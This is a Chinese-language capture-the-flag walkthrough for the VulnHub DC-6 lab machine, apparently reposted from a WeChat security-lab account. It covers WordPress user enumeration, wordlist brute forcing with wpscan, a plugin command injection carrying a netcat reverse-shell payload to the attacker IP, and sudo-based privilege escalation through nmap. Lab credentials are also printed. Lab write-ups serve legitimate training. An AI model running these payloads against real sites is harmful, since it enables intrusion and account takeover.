1. 靶机下载地址
https://www.vulnhub.com/entry/dc-6,315/
2. 环境说明
使用VMware Workstation 打开虚拟机,设置网络为NET模式
靶机ip:192.168.10.136
攻击ip:192.168.10.133
3. 信息收集
使用命令:arp-scan -l 发现内网中的主机
使用命令:nmap -A -p- 192.168.10.136,扫描端口和对应的详细服务信息
发现开放80端口,由于网站会把连接跳转到域名主机名wordy,所以需要修改hosts,添加 192.168.10.136 wordy 靶机ip绑定wordy域名,然后进行网页访问。
dirb扫描目录
登录后发现后台登录地址http://wordy/wp-login.php
从显示的信息来看是WordPress,使用wpscan扫描枚举下用户
wpscan --url http://wordy --enumerate u
发现了上述用户,使用vim编辑器将上述用户放在一个文本里面,用作后面的账号密码破解
vim dc6-user
作者在vulnhub上给了个提示,为了减少暴力破解的时间,需要将包含“k01”的字符串从字典里筛选出来作为新字典用
rockyou.txt,这是kali自带的一个密码字典,这个字典非常庞大,有几千万的数据,如果使用整个字典爆破的话要花费很长时间,所以先输入提示中的命令来筛选一些密码保存到文件中,再进行爆破
cat /usr/share/wordlists/rockyou.txt | grep k01 > DC6passwd.txt
4.漏洞利用
使用wpscan暴力破解发现用户名和密码:mark/helpdesk01
wpscan --url http://wordy/ -U dc6-user -P DC6passwd.txt -t 50
成功登录
发现存在activity monitor
在activity中发现tools插件可以命令执行,但是前端有长度限制,通过F12修改输入长度限制
输入127.0.0.1 | nc -e /bin/sh 192.168.10.133 9999
Kali监听9999端口,执行lookup
python获得交互shell,查看目录
python -c "import pty;pty.spawn('/bin/bash')"
在mark目录下,发现了用户graham的账号和密码
使用ssh连接账号graham,密码GSo7isUM1D4
5.提权
登录成功,执行sudo -l,在/home/jens目录下发现一个sh文件
查看文件内容发现是对网站的打包命令,作用是备份网站根目录
向backups.sh文件中写入”/bin/bash”
以jens用户去执行该脚本
执行sudo -l命令,发现在jens的shell下,可以在不需要密码的情况下,以root的身份权限执行nmap
nmap工具是可以执行脚本的,那么我们把弹root用户shell的命令写入到nmap的脚本里面,然后用nmap命令执行即可切换到root用户的shell
在root目录下发现Theflag.txt文件
原文始发于微信公众号(CTS纵横安全实验室):DC靶机实战记录06
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论